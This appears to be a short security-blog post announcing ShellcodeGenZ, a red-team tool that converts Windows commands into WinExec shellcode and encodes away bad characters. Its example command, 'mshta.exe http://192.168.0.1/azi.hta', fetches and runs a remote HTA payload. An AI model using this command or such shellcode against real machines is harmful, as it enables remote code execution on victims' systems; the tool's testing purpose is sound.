ShellcodeGenZ: Shellcode Generator to execute commands with winExec API

by ddos · May 1, 2025

ShellcodeGenZ takes your commands (like mshta.exe http://192.168.0.1/azi.hta) and turns ’em into shellcode that’s ready to flex. It hunts down bad chars (like 0x0a, 0x0b, or the default 0x00), lets you yeet ’em manually or auto with add/subtract offsets, and logs every move so you’re never lost. If 0x00 sneaks into push instructions, it’s a hard pass—script’s outtie. With colored output and Gen-Z slang, it’s like codin’ with your besties.

Features

Shellcode Gen: Turns commands into lit shellcode.
Bad Char Yeeter: Spots bad chars and lets you fix ’em ( encode ) manual (pick your hex) or auto (add/subtract offsets).
Manual Offset Drip: Choose your own offset for auto mode, or let it test 0x01 to 0xff.
0x00 Check: Always yeets 0x00 and bails if it’s in push instructions and the whole shellcode.
Logs for Days: Detailed logs with Gen-Z flair so you know what’s good.
Colorful Vibes: Rockin’ colorama for that terminal glow-up.

Use

Run the Script: Fire it up in your virtual env:

python3 ShellcodeGenZ.py
Drop Your Inputs:
- mshta command: Like mshta.exe http://192.168.0.1/azi.hta.
- Bad chars: Comma-separated hex (e.g., 0a,0b). It always checks 0x00, no cap.
Yeet Bad Chars:
- If bad chars pop up, choose to yeet ’em (Y/N).
- Pick manual (drop new hex values) or automated (add/subtract offsets).
- For auto, select manual offset (like 01) or automatic (tests all offsets).
Check the Output:
- Shellcode drops as a byte string (e.g., b”\x…”).
- Logs spill the tea on every step, from instructions to bad char fixes.

Install

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal